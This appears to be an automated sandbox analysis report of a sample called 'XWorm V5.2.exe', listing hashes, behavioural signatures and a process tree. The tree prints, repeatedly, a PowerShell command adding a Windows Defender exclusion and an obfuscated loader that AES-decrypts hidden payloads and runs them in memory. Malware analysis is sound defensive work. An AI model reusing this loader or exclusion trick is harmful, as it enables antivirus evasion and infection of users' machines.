Analysis
-
max time kernel
359s -
max time network
360s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
05-09-2024 00:10
Static task
static1
Behavioral task
behavioral1
Sample
XWorm V5.2.exe
Resource
win7-20240704-en
General
-
Target
XWorm V5.2.exe
-
Size
18.2MB
-
MD5
bdc4539e8060d4db24a69db716a1cec0
-
SHA1
71c2485bf1684e73f16a213568efcaa2cb88ce6f
-
SHA256
c39cc9aaa0311fd1f6d981e995b608b0d36e464aea09896bd17b41bbd3fc1fe6
-
SHA512
b2411923cf5c2e4f96682f73234c409eca38b1712413ec946b1d652a4ddc266376eebe02fd6878dc3fc379eff1307f09407bc06db576c462ded08a839087eb4f
-
SSDEEP
393216:s+gzSUAx9phaAUnQeGUPG/uVeZ/K2B1CkcDUDLHK18as0mcvow+Ax:1CwUAQQLIG/5//CFU/qO0T
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 11 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2040 powershell.exe 2764 powershell.exe 1628 powershell.exe 2508 powershell.exe 1728 powershell.exe 2328 powershell.exe 948 powershell.exe 2092 powershell.exe 2880 powershell.exe 536 powershell.exe 2364 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepid process 2880 powershell.exe 536 powershell.exe 1984 powershell.exe 2928 powershell.exe 1728 powershell.exe 1280 powershell.exe 2328 powershell.exe 868 powershell.exe 948 powershell.exe 1704 powershell.exe 2040 powershell.exe 2400 powershell.exe 2364 powershell.exe 2692 powershell.exe 2092 powershell.exe 1660 powershell.exe 2764 powershell.exe 2464 powershell.exe 1628 powershell.exe 2472 powershell.exe 2508 powershell.exe 2592 powershell.exe -
Suspicious use of AdjustPrivilegeToken 22 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2880 powershell.exe Token: SeDebugPrivilege 536 powershell.exe Token: SeDebugPrivilege 1984 powershell.exe Token: SeDebugPrivilege 2928 powershell.exe Token: SeDebugPrivilege 1728 powershell.exe Token: SeDebugPrivilege 1280 powershell.exe Token: SeDebugPrivilege 2328 powershell.exe Token: SeDebugPrivilege 868 powershell.exe Token: SeDebugPrivilege 948 powershell.exe Token: SeDebugPrivilege 1704 powershell.exe Token: SeDebugPrivilege 2040 powershell.exe Token: SeDebugPrivilege 2400 powershell.exe Token: SeDebugPrivilege 2364 powershell.exe Token: SeDebugPrivilege 2692 powershell.exe Token: SeDebugPrivilege 2092 powershell.exe Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 2764 powershell.exe Token: SeDebugPrivilege 2464 powershell.exe Token: SeDebugPrivilege 1628 powershell.exe Token: SeDebugPrivilege 2472 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 2592 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
XWorm V5.2.exeXWorm V5.2.execmd.execmd.exeXWorm V5.2.execmd.exeXWorm V5.2.execmd.exeXWorm V5.2.exedescription pid process target process PID 2820 wrote to memory of 2596 2820 XWorm V5.2.exe XWorm V5.2.exe PID 2820 wrote to memory of 2596 2820 XWorm V5.2.exe XWorm V5.2.exe PID 2820 wrote to memory of 2596 2820 XWorm V5.2.exe XWorm V5.2.exe PID 2820 wrote to memory of 2880 2820 XWorm V5.2.exe powershell.exe PID 2820 wrote to memory of 2880 2820 XWorm V5.2.exe powershell.exe PID 2820 wrote to memory of 2880 2820 XWorm V5.2.exe powershell.exe PID 2820 wrote to memory of 2664 2820 XWorm V5.2.exe cmd.exe PID 2820 wrote to memory of 2664 2820 XWorm V5.2.exe cmd.exe PID 2820 wrote to memory of 2664 2820 XWorm V5.2.exe cmd.exe PID 2596 wrote to memory of 2604 2596 XWorm V5.2.exe XWorm V5.2.exe PID 2596 wrote to memory of 2604 2596 XWorm V5.2.exe XWorm V5.2.exe PID 2596 wrote to memory of 2604 2596 XWorm V5.2.exe XWorm V5.2.exe PID 2596 wrote to memory of 536 2596 XWorm V5.2.exe powershell.exe PID 2596 wrote to memory of 536 2596 XWorm V5.2.exe powershell.exe PID 2596 wrote to memory of 536 2596 XWorm V5.2.exe powershell.exe PID 2664 wrote to memory of 2292 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2292 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 2292 2664 cmd.exe cmd.exe PID 2664 wrote to memory of 1984 2664 cmd.exe powershell.exe PID 2664 wrote to memory of 1984 2664 cmd.exe powershell.exe PID 2664 wrote to memory of 1984 2664 cmd.exe powershell.exe PID 2596 wrote to memory of 2112 2596 XWorm V5.2.exe cmd.exe PID 2596 wrote to memory of 2112 2596 XWorm V5.2.exe cmd.exe PID 2596 wrote to memory of 2112 2596 XWorm V5.2.exe cmd.exe PID 2112 wrote to memory of 2900 2112 cmd.exe cmd.exe PID 2112 wrote to memory of 2900 2112 cmd.exe cmd.exe PID 2112 wrote to memory of 2900 2112 cmd.exe cmd.exe PID 2112 wrote to memory of 2928 2112 cmd.exe powershell.exe PID 2112 wrote to memory of 2928 2112 cmd.exe powershell.exe PID 2112 wrote to memory of 2928 2112 cmd.exe powershell.exe PID 2604 wrote to memory of 1120 2604 XWorm V5.2.exe XWorm V5.2.exe PID 2604 wrote to memory of 1120 2604 XWorm V5.2.exe XWorm V5.2.exe PID 2604 wrote to memory of 1120 2604 XWorm V5.2.exe XWorm V5.2.exe PID 2604 wrote to memory of 1728 2604 XWorm V5.2.exe powershell.exe PID 2604 wrote to memory of 1728 2604 XWorm V5.2.exe powershell.exe PID 2604 wrote to memory of 1728 2604 XWorm V5.2.exe powershell.exe PID 2604 wrote to memory of 2056 2604 XWorm V5.2.exe cmd.exe PID 2604 wrote to memory of 2056 2604 XWorm V5.2.exe cmd.exe PID 2604 wrote to memory of 2056 2604 XWorm V5.2.exe cmd.exe PID 2056 wrote to memory of 1632 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 1632 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 1632 2056 cmd.exe cmd.exe PID 2056 wrote to memory of 1280 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 1280 2056 cmd.exe powershell.exe PID 2056 wrote to memory of 1280 2056 cmd.exe powershell.exe PID 1120 wrote to memory of 2488 1120 XWorm V5.2.exe XWorm V5.2.exe PID 1120 wrote to memory of 2488 1120 XWorm V5.2.exe XWorm V5.2.exe PID 1120 wrote to memory of 2488 1120 XWorm V5.2.exe XWorm V5.2.exe PID 1120 wrote to memory of 2328 1120 XWorm V5.2.exe powershell.exe PID 1120 wrote to memory of 2328 1120 XWorm V5.2.exe powershell.exe PID 1120 wrote to memory of 2328 1120 XWorm V5.2.exe powershell.exe PID 1120 wrote to memory of 1288 1120 XWorm V5.2.exe cmd.exe PID 1120 wrote to memory of 1288 1120 XWorm V5.2.exe cmd.exe PID 1120 wrote to memory of 1288 1120 XWorm V5.2.exe cmd.exe PID 1288 wrote to memory of 1716 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 1716 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 1716 1288 cmd.exe cmd.exe PID 1288 wrote to memory of 868 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 868 1288 cmd.exe powershell.exe PID 1288 wrote to memory of 868 1288 cmd.exe powershell.exe PID 2488 wrote to memory of 1412 2488 XWorm V5.2.exe XWorm V5.2.exe PID 2488 wrote to memory of 1412 2488 XWorm V5.2.exe XWorm V5.2.exe PID 2488 wrote to memory of 1412 2488 XWorm V5.2.exe XWorm V5.2.exe PID 2488 wrote to memory of 948 2488 XWorm V5.2.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:2596 -
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"4⤵
- Suspicious use of WriteProcessMemory
PID:1120 -
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"5⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"6⤵PID:1412
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"7⤵PID:2940
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"8⤵PID:2276
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"9⤵PID:2284
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"10⤵PID:1228
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"11⤵PID:1032
-
C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.exe"12⤵PID:328
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'12⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2508
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "12⤵PID:2760
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "13⤵PID:2780
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2592
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1628
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "11⤵PID:1532
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "12⤵PID:2388
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"12⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2472
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2764
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "10⤵PID:2460
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "11⤵PID:1952
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"11⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2464
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'9⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2092
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "9⤵PID:1804
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "10⤵PID:2340
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"10⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2364
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "8⤵PID:2912
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "9⤵PID:2744
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2692
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'7⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2040
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "7⤵PID:1828
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Ht0j9zPSqBi69tTX5kflrnUeoIA5im8gLLZnexTvmMs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('yPdScja9U8RjkyeOpTlzgQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $gScxN=New-Object System.IO.MemoryStream(,$param_var); $drTXw=New-Object System.IO.MemoryStream; $JmztZ=New-Object System.IO.Compression.GZipStream($gScxN, [IO.Compression.CompressionMode]::Decompress); $JmztZ.CopyTo($drTXw); $JmztZ.Dispose(); $gScxN.Dispose(); $drTXw.Dispose(); $drTXw.ToArray();}function execute_function($param_var,$param2_var){ $BTSMq=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $tsXTL=$BTSMq.EntryPoint; $tsXTL.Invoke($null, $param2_var);}$sQwMN = 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat';$host.UI.RawUI.WindowTitle = $sQwMN;$CexYw=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($sQwMN).Split([Environment]::NewLine);foreach ($JUrKH in $CexYw) { if ($JUrKH.StartsWith('sgymnEOEMpmtiRUpGEhO')) { $hWNDm=$JUrKH.Substring(20); break; }}$payloads_var=[string[]]$hWNDm.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "8⤵PID:2804
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"8⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2400
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat'6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:948
-
-
C:\Windows\system32\cmd.execmd /c ""C:\Users\Admin\AppData\Local\Temp\XWorm V5.2.bat" "6⤵PID:1060
-
